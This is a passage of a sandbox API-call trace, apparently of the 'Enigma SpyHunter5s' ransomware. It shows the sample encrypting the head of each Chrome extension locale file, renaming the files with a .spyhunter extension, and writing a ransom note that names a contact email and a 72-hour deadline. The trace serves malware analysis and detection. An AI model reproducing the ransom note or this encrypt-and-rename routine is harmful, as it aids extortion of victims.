(in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json.spyhunter") returned 174 [0157.283] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json.spyhunter")) returned 1 [0157.284] GetProcessHeap () returned 0x2c0000 [0157.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.284] GetProcessHeap () returned 0x2c0000 [0157.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0157.284] GetProcessHeap () returned 0x2c0000 [0157.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30078f8 | out: hHeap=0x2c0000) returned 1 [0157.284] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eb10 | out: pbBuffer=0x270eb10) returned 1 [0157.284] GetProcessHeap () returned 0x2c0000 [0157.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0157.284] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eb08*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eb08*=0x30) returned 1 [0157.284] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0157.285] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json") returned 164 [0157.286] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.286] GetProcessHeap () returned 0x2c0000 [0157.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0157.286] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eacc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270eacc*=0x2800, lpOverlapped=0x0) returned 1 [0157.289] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.289] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270eacc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270eacc*=0x2800, lpOverlapped=0x0) returned 1 [0157.289] GetProcessHeap () returned 0x2c0000 [0157.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0157.289] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.289] WriteFile (in: hFile=0x178, lpBuffer=0x270eb0c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eacc, lpOverlapped=0x0 | out: lpBuffer=0x270eb0c*, lpNumberOfBytesWritten=0x270eacc*=0x4, lpOverlapped=0x0) returned 1 [0157.289] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eacc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270eacc*=0x30, lpOverlapped=0x0) returned 1 [0157.289] CloseHandle (hObject=0x178) returned 1 [0157.290] GetProcessHeap () returned 0x2c0000 [0157.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.290] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json.spyhunter") returned 174 [0157.290] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json.spyhunter")) returned 1 [0157.291] GetProcessHeap () returned 0x2c0000 [0157.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.291] GetProcessHeap () returned 0x2c0000 [0157.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0157.291] GetProcessHeap () returned 0x2c0000 [0157.291] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3007298 | out: hHeap=0x2c0000) returned 1 [0157.291] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0157.292] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.292] WriteFile (in: hFile=0x178, lpBuffer=0x270ea43*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270eb6c, lpOverlapped=0x0 | out: lpBuffer=0x270ea43*, lpNumberOfBytesWritten=0x270eb6c*=0x127, lpOverlapped=0x0) returned 1 [0157.293] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.293] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270eb6c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270eb6c*=0x2ac, lpOverlapped=0x0) returned 1 [0157.293] CloseHandle (hObject=0x178) returned 1 [0157.293] GetProcessHeap () returned 0x2c0000 [0157.293] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3007100 | out: hHeap=0x2c0000) returned 1 [0157.293] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eb08 | out: pbBuffer=0x270eb08) returned 1 [0157.293] GetProcessHeap () returned 0x2c0000 [0157.293] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0157.293] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eb00*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eb00*=0x30) returned 1 [0157.294] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0157.294] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json") returned 164 [0157.294] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.294] GetProcessHeap () returned 0x2c0000 [0157.294] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0157.294] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eac4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270eac4*=0x2800, lpOverlapped=0x0) returned 1 [0157.311] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.311] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270eac4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270eac4*=0x2800, lpOverlapped=0x0) returned 1 [0157.312] GetProcessHeap () returned 0x2c0000 [0157.312] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0157.312] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.312] WriteFile (in: hFile=0x178, lpBuffer=0x270eb04*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eac4, lpOverlapped=0x0 | out: lpBuffer=0x270eb04*, lpNumberOfBytesWritten=0x270eac4*=0x4, lpOverlapped=0x0) returned 1 [0157.312] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eac4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270eac4*=0x30, lpOverlapped=0x0) returned 1 [0157.312] CloseHandle (hObject=0x178) returned 1 [0157.312] GetProcessHeap () returned 0x2c0000 [0157.312] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0157.312] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json.spyhunter") returned 174 [0157.312] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\messages.json.spyhunter")) returned 1 [0157.313] GetProcessHeap () returned 0x2c0000 [0157.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0157.313] GetProcessHeap () returned 0x2c0000 [0157.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0157.313] GetProcessHeap () returned 0x2c0000 [0157.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3006f68 | out: hHeap=0x2c0000) returned 1 [0157.314] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0157.314] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.314] WriteFile (in: hFile=0x178, lpBuffer=0x270ea3b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270eb64, lpOverlapped=0x0 | out: lpBuffer=0x270ea3b*, lpNumberOfBytesWritten=0x270eb64*=0x127, lpOverlapped=0x0) returned 1 [0157.315] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.315] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270eb64, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270eb64*=0x2ac, lpOverlapped=0x0) returned 1 [0157.316] CloseHandle (hObject=0x178) returned 1 [0157.316] GetProcessHeap () returned 0x2c0000 [0157.316] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3006770 | out: hHeap=0x2c0000) returned 1 [0157.316] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eb00 | out: pbBuffer=0x270eb00) returned 1 [0157.316] GetProcessHeap () returned 0x2c0000 [0157.316] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0157.316] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eaf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eaf8*=0x30) returned 1 [0157.316] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0157.317] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json") returned 164 [0157.317] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0157.317] GetProcessHeap () returned 0x2c0000 [0157.317] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0157.317] ReadFile (in: hFile=0x178, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eabc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270eabc*=0x2800, lpOverlapped=0x0) returned 1 [0157.333] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.333] WriteFile (in: hFile=0x178, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270eabc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270eabc*=0x2800, lpOverlapped=0x0) returned 1 [0157.333] GetProcessHeap () returned 0x2c0000 [0157.333] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0157.333] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0157.333] WriteFile (in: hFile=0x178, lpBuffer=0x270eafc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eabc, lpOverlapped=0x0 | out: lpBuffer=0x270eafc*, lpNumberOfBytesWritten=0x270eabc*=0x4, lpOverlapped=0x0) returned 1 [0157.374] WriteFile (in: hFile=0x178, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eabc, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270eabc*=0x30, lpOverlapped=0x0) returned 1 [0157.375] CloseHandle (hObject=0x178) returned 1 [0157.375] GetProcessHeap () returned 0x2c0000 [0157.375] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0157.375] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json.spyhunter") returned 174 [0157.375] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\it\\messages.json.spyhunter")) returned 1 [0157.376] GetProcessHeap () returned 0x2c0000 [0157.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0157.376] GetProcessHeap () returned 0x2c0000 [0157.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0157.376] GetProcessHeap () returned 0x2c0000 [0157.376] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30065d8 | out: hHeap=0x2c0000) returned 1 [0157.376] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0157.377] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0157.377] WriteFile (in: hFile=0x178, lpBuffer=0x270ea33*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270eb5c, lpOverlapped=0x0 | out: lpBuffer=0x270ea33*, lpNumberOfBytesWritten=0x270eb5c*=0x127, lpOverlapped=0x0) returned 1 [0157.378] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0157.379] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270eb5c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270eb5c*=0x2ac, lpOverlapped=0x0) returned 1 [0157.379] CloseHandle (hObject=0x178) returned 1 [0157.379] GetProcessHeap () returned 0x2c0000 [0157.379] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f25180 | out: hHeap=0x2c0000) returned 1 [0157.379] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270eaf8 | out: pbBuffer=0x270eaf8) returned 1 [0157.379] GetProcessHeap () returned 0x2c0000 [0157.379] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0157.379] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270eaf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270eaf0*=0x30) returned 1 [0157.380] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 